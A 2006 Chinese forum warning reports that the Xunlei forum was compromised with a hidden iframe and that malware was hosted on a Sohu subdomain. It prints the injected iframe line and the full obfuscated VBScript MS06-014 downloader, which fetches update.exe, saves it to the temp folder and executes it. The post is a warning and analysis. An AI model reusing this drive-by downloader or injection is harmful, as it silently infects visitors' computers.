预警:迅雷官方论坛被挂马以及搜狐被入侵

致命诱惑

LEVEL 8(卓越品质)

发帖初学者

Rank: 7 Rank: 7 Rank: 7

帖子: 505
精华: 0
积分: 374
金币: 18690 枚
原创: 0 贴
威望: 0 点
支持: 506 度
感谢: 52 度
贡献: 0 值
赞助: 0 次
推广: 0 人
阅读权限: 60
注册时间: 2006-7-9

1楼大中小发表于 2006-12-10 09:09 只看该作者

本贴共获得感谢 X 3

预警:迅雷官方论坛被挂马以及搜狐被入侵

在某个群里听说迅雷的官方论坛被挂马了

上去看看果真如此

http://bbs.xunlei.com/discuz/index.php

在temp文件夹生成 moi.com

然后仔细一看迅雷论坛木马的来源更是吓了一跳

木马来自
http://zhaoshang.sohu.com/aa/update.exe

木马存放的竟然是搜狐这意味着搜狐也被入侵了

根据virus提供的消息我重新补充几点

迅雷论坛的首页被插入以下代码

CODE: [Copy to clipboard] <script type="text/javascript" src="../sandai/templates/skins.js"></script>

其实关键在 skins.js 里面

skins.js 被插入以下代码

CODE: [Copy to clipboard] document.write('<iframe height=0 width=0 src="http://zhaoshang.sohu.com/aa/index.htm"></iframe>');

OK
然后http://zhaoshang.sohu.com/aa/index.htm 里面就很简单了

CODE: [Copy to clipboard] <script language="VBScript">
on error resume next
Set dfile = document.createElement("ob"&QQ63200ddd&"ject")
dfile.setAttribute "cla"&Q52fg&"ssid", "clsid:B"&fgQ6725fg&"D96C556-"&fQ6ff&"65A3-11"&fg12525&"D0-983A-"&QQ63200&"00C04F"&QQ63200&"C29E36"
Set http = dfile.CreateObject("Micro"&QQ63200&"soft.X"&F4sdTRhh&"MLH"&"TTP","")
set strm = dfile.createobject("Ad"&QQ63200&"odb."&F4sdTRhh&"Str"&"eam","")
strm.type = 1
http.Open "GET", "http://zhaoshang.sohu.com/aa/update.exe", False
http.Send
set fso = dfile.createobject("Scri"&fdsfsdf&"pting.Fil"&"eSyst"&"emObject","")
set temp = fso.GetSpecialFolder(2)
filename= fso.BuildPath(temp,"moi.com")
strm.open
strm.write http.responseBody
strm.savetofile filename,2
strm.close
b1="She"
b2="ll."
b3="Applic"
b4="ation"
set exc = dfile.createobject(b1&QQ63200&b2&F4sdTRhh&b3&b4,"")
str4="open"
exc.ShellExecute filename,"","",str4,0
</script>

不过这段简单的MS06-14网马倒留下了一些可以捕捉的痕迹

里面这么一段代码
Set dfile = document.createElement("ob"&QQ63200ddd&"ject")

看见红字么这就是 QQ号码经过验证属有效的 QQ号码

以上是从安全论坛获得的最新信息,另外最近各大网站被挂马、入侵事件比较多，像番茄花园、中关村在线等。坛友注意升级杀软，多加留意。